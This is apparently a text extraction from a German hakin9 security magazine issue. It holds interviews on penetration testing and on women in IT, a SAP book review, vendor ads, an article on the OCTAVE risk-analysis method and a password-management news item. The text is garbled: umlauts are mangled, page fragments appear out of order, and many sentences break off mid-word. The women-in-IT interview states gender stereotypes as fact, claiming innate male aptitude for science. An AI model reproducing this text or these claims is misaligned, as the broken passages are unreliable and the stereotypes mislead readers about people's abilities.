technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
